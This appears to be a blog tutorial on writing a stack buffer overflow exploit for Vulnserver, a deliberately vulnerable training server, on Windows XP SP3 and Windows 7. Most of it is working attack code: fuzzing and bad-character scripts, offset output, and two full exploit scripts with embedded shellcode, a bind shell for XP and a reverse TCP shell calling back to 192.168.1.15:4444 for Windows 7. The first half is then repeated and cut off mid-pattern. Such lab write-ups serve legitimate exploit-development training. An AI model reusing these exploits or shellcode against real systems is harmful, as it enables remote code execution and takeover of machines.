This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Vulnserver and exploit writing PoC:
I had some free time. So I set back to exercise on Vulnserver. This is a short tutorial on how to write an exploit for Vulnserver for both XP SP3 and Windows 7.
The process is pretty straight forward:
1. We have to determine where the overflow happens for the purpose we use a pattern of non-repeatable characters.
#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5050
import socket
# Place the pattern here
pattern = ""
try:
# while True:
# open a connection to vulnserver
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect (("192.168.1.26", 9999))
# receive the banner for vulnserver
s.recv (1024)
s.send ("TRUN /.:/" + pattern + " \r\n")
# receive the response from vulnserver
s.recv (1024)
# close the connection
s.close ()
except:
# if we get to here then something happened to vulnserver because the connection is closed
print "Socket closed "
#
#
2. To get the exact location for the offset we search for the characters that we last saw in the stack.
#[*] No exact matches, looking for likely candidates...
#[+] Possible match at offset 446 (adjusted [ little-endian: 8704 | big-endian: 19788799 ] ) byte offset 1
#[+] Possible match at offset 1226 (adjusted [ little-endian: 8448 | big-endian: 19723263 ] ) byte offset 1
#[+] Possible match at offset 2006 (adjusted [ little-endian: 8192 | big-endian: 19657727 ] ) byte offset 1
#[+] Possible match at offset 2786 (adjusted [ little-endian: 7936 | big-endian: 19592191 ] ) byte offset 1
#[+] Possible match at offset 3566 (adjusted [ little-endian: 7680 | big-endian: 19526655 ] ) byte offset 1
#[+] Possible match at offset 4346 (adjusted [ little-endian: 7424 | big-endian: 19461119 ] ) byte offset 1
#[+] Possible match at offset 5126 (adjusted [ little-endian: 7168 | big-endian: 19395583 ] ) byte offset 1
#[+] Possible match at offset 5906 (adjusted [ little-endian: 6912 | big-endian: 19330047 ] ) byte offset 1
#[+] Possible match at offset 6686 (adjusted [ little-endian: 6656 | big-endian: 19264511 ] ) byte offset 1
#[+] Possible match at offset 7466 (adjusted [ little-endian: 6400 | big-endian: 19198975 ] ) byte offset 1
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6F43376F
[*] Exact match at offset 2002
I checked manually the offset and the exact location was 2006
For reference this was the pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2G
3. After we determine the offset we have to determine the bad characters in our case the \x00
We use this script below to determine a bad char:
#!/usr/bin/python
import socket
server = '192.168.1.26'
sport = 9999
prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0, 256):
testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
When we tests with the \x00 we get an access violation at 45444342 the last that we get written is BCDE - so \x00 is a bad char.
To skip \x00 we change the range of characters to (1,256). I saw that after skipping the bad char there were chars going to the stack.
4. We will need to jump to an ESP register where we can inject our exploitation code.
For XP I used findjmp to find a ESP that is directly to KERNEL32.DLL:
https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
Both USER32 and KERNEL32 are usable:
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0 call esp
#0x7C86467B jmp esp
#0x7C868667 call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
Exploit for Vulnserver on Windows XP:
import socket
#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))
SER_ADDR = '192.168.1.27'
SER_PORT = 9999
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')
data = my_sock.recv(1024)
#Possible Registers for usage on XP SP3
#https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0 call esp
#0x7C86467B jmp esp
#0x7C868667 call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
message = '\x41' * 2006 + '\x67\x86\x86\x7c' #CALL ESP that we chose
message += '\x90' * 16
#/usr/share/framework2
#./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"
message +=(
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef\x4d\x96"
"\x95\x83\xeb\xfc\xe2\xf4\x13\x27\x7d\xd8\x07\xb4\x69\x6a\x10\x2d"
"\x1d\xf9\xcb\x69\x1d\xd0\xd3\xc6\xea\x90\x97\x4c\x79\x1e\xa0\x55"
"\x1d\xca\xcf\x4c\x7d\xdc\x64\x79\x1d\x94\x01\x7c\x56\x0c\x43\xc9"
"\x56\xe1\xe8\x8c\x5c\x98\xee\x8f\x7d\x61\xd4\x19\xb2\xbd\x9a\xa8"
"\x1d\xca\xcb\x4c\x7d\xf3\x64\x41\xdd\x1e\xb0\x51\x97\x7e\xec\x61"
"\x1d\x1c\x83\x69\x8a\xf4\x2c\x7c\x4d\xf1\x64\x0e\xa6\x1e\xaf\x41"
"\x1d\xe5\xf3\xe0\x1d\xd5\xe7\x13\xfe\x1b\xa1\x43\x7a\xc5\x10\x9b"
"\xf0\xc6\x89\x25\xa5\xa7\x87\x3a\xe5\xa7\xb0\x19\x69\x45\x87\x86"
"\x7b\x69\xd4\x1d\x69\x43\xb0\xc4\x73\xf3\x6e\xa0\x9e\x97\xba\x27"
"\x94\x6a\x3f\x25\x4f\x9c\x1a\xe0\xc1\x6a\x39\x1e\xc5\xc6\xbc\x1e"
"\xd5\xc6\xac\x1e\x69\x45\x89\x25\x93\xb4\x89\x1e\x1f\x74\x7a\x25"
"\x32\x8f\x9f\x8a\xc1\x6a\x39\x27\x86\xc4\xba\xb2\x46\xfd\x4b\xe0"
"\xb8\x7c\xb8\xb2\x40\xc6\xba\xb2\x46\xfd\x0a\x04\x10\xdc\xb8\xb2"
"\x40\xc5\xbb\x19\xc3\x6a\x3f\xde\xfe\x72\x96\x8b\xef\xc2\x10\x9b"
"\xc3\x6a\x3f\x2b\xfc\xf1\x89\x25\xf5\xf8\x66\xa8\xfc\xc5\xb6\x64"
"\x5a\x1c\x08\x27\xd2\x1c\x0d\x7c\x56\x66\x45\xb3\xd4\xb8\x11\x0f"
"\xba\x06\x62\x37\xae\x3e\x44\xe6\xfe\xe7\x11\xfe\x80\x6a\x9a\x09"
"\x69\x43\xb4\x1a\xc4\xc4\xbe\x1c\xfc\x94\xbe\x1c\xc3\xc4\x10\x9d"
"\xfe\x38\x36\x48\x58\xc6\x10\x9b\xfc\x6a\x10\x7a\x69\x45\x64\x1a"
"\x6a\x16\x2b\x29\x69\x43\xbd\xb2\x46\xfd\x1f\xc7\x92\xca\xbc\xb2"
"\x40\x6a\x3f\x4d\x96\x95")
my_sock.send(('TRUN .' + message + '\r\n'))
print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()
Exploit for Vulnserver on Windows 7:
import socket
#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))
SER_ADDR = '192.168.1.26'
SER_PORT = 9999
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')
data = my_sock.recv(1024)
prefix = '\x41' * 2006
esp = '\xaf\x11\x50\x62' #CALL ESP that we chose
nopsled = '\x90' * 16
#!mona find -s "\xff\xe4" -m essfunc.dll
#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' <-works
payload =(
"\xdd\xc5\xd9\x74\x24\xf4\xb8\x84\x6e\x28\xf3\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\x46\x6a\xca\x06\xba\x9b\x88"
"\xe9\x42\x5c\xed\x60\xa7\x6d\x2d\x16\xac\xde\x9d\x5c\xe0\xd2"
"\x56\x30\x10\x60\x1a\x9d\x17\xc1\x91\xfb\x16\xd2\x8a\x38\x39"
"\x50\xd1\x6c\x99\x69\x1a\x61\xd8\xae\x47\x88\x88\x67\x03\x3f"
"\x3c\x03\x59\xfc\xb7\x5f\x4f\x84\x24\x17\x6e\xa5\xfb\x23\x29"
"\x65\xfa\xe0\x41\x2c\xe4\xe5\x6c\xe6\x9f\xde\x1b\xf9\x49\x2f"
"\xe3\x56\xb4\x9f\x16\xa6\xf1\x18\xc9\xdd\x0b\x5b\x74\xe6\xc8"
"\x21\xa2\x63\xca\x82\x21\xd3\x36\x32\xe5\x82\xbd\x38\x42\xc0"
"\x99\x5c\x55\x05\x92\x59\xde\xa8\x74\xe8\xa4\x8e\x50\xb0\x7f"
"\xae\xc1\x1c\xd1\xcf\x11\xff\x8e\x75\x5a\x12\xda\x07\x01\x7b"
"\x2f\x2a\xb9\x7b\x27\x3d\xca\x49\xe8\x95\x44\xe2\x61\x30\x93"
"\x05\x58\x84\x0b\xf8\x63\xf5\x02\x3f\x37\xa5\x3c\x96\x38\x2e"
"\xbc\x17\xed\xe1\xec\xb7\x5e\x42\x5c\x78\x0f\x2a\xb6\x77\x70"
"\x4a\xb9\x5d\x19\xe1\x40\x36\xe6\x5e\x4b\xc9\x8e\x9c\x4b\xc4"
"\x12\x28\xad\x8c\xba\x7c\x66\x39\x22\x25\xfc\xd8\xab\xf3\x79"
"\xda\x20\xf0\x7e\x95\xc0\x7d\x6c\x42\x21\xc8\xce\xc5\x3e\xe6"
"\x66\x89\xad\x6d\x76\xc4\xcd\x39\x21\x81\x20\x30\xa7\x3f\x1a"
"\xea\xd5\xbd\xfa\xd5\x5d\x1a\x3f\xdb\x5c\xef\x7b\xff\x4e\x29"
"\x83\xbb\x3a\xe5\xd2\x15\x94\x43\x8d\xd7\x4e\x1a\x62\xbe\x06"
"\xdb\x48\x01\x50\xe4\x84\xf7\xbc\x55\x71\x4e\xc3\x5a\x15\x46"
"\xbc\x86\x85\xa9\x17\x03\xb5\xe3\x35\x22\x5e\xaa\xac\x76\x03"
"\x4d\x1b\xb4\x3a\xce\xa9\x45\xb9\xce\xd8\x40\x85\x48\x31\x39"
"\x96\x3c\x35\xee\x97\x14"
)
message = prefix + esp + nopsled + payload + 'C' * (3000-len(prefix)-len(esp)-len(nopsled)-len(payload))
my_sock.send(('TRUN .' + message + '\r\n'))
print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()
I had some free time. So I set back to exercise on Vulnserver. This is a short tutorial on how to write an exploit for Vulnserver for both XP SP3 and Windows 7.
The process is pretty straight forward:
1. We have to determine where the overflow happens for the purpose we use a pattern of non-repeatable characters.
#/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5050
# Place the pattern here
pattern = ""
try:
# while True:
# open a connection to vulnserver
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect (("192.168.1.26", 9999))
# receive the banner for vulnserver
s.recv (1024)
s.send ("TRUN /.:/" + pattern + " \r\n")
# receive the response from vulnserver
s.recv (1024)
# close the connection
s.close ()
except:
# if we get to here then something happened to vulnserver because the connection is closed
print "Socket closed "
#
#
2. To get the exact location for the offset we search for the characters that we last saw in the stack.
#/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 8co9
#[*] No exact matches, looking for likely candidates...
#[+] Possible match at offset 446 (adjusted [ little-endian: 8704 | big-endian: 19788799 ] ) byte offset 1
#[+] Possible match at offset 1226 (adjusted [ little-endian: 8448 | big-endian: 19723263 ] ) byte offset 1
#[+] Possible match at offset 2006 (adjusted [ little-endian: 8192 | big-endian: 19657727 ] ) byte offset 1
#[+] Possible match at offset 2786 (adjusted [ little-endian: 7936 | big-endian: 19592191 ] ) byte offset 1
#[+] Possible match at offset 3566 (adjusted [ little-endian: 7680 | big-endian: 19526655 ] ) byte offset 1
#[+] Possible match at offset 4346 (adjusted [ little-endian: 7424 | big-endian: 19461119 ] ) byte offset 1
#[+] Possible match at offset 5126 (adjusted [ little-endian: 7168 | big-endian: 19395583 ] ) byte offset 1
#[+] Possible match at offset 5906 (adjusted [ little-endian: 6912 | big-endian: 19330047 ] ) byte offset 1
#[+] Possible match at offset 6686 (adjusted [ little-endian: 6656 | big-endian: 19264511 ] ) byte offset 1
#[+] Possible match at offset 7466 (adjusted [ little-endian: 6400 | big-endian: 19198975 ] ) byte offset 1
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6F43376F
[*] Exact match at offset 2002
For reference this was the pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3C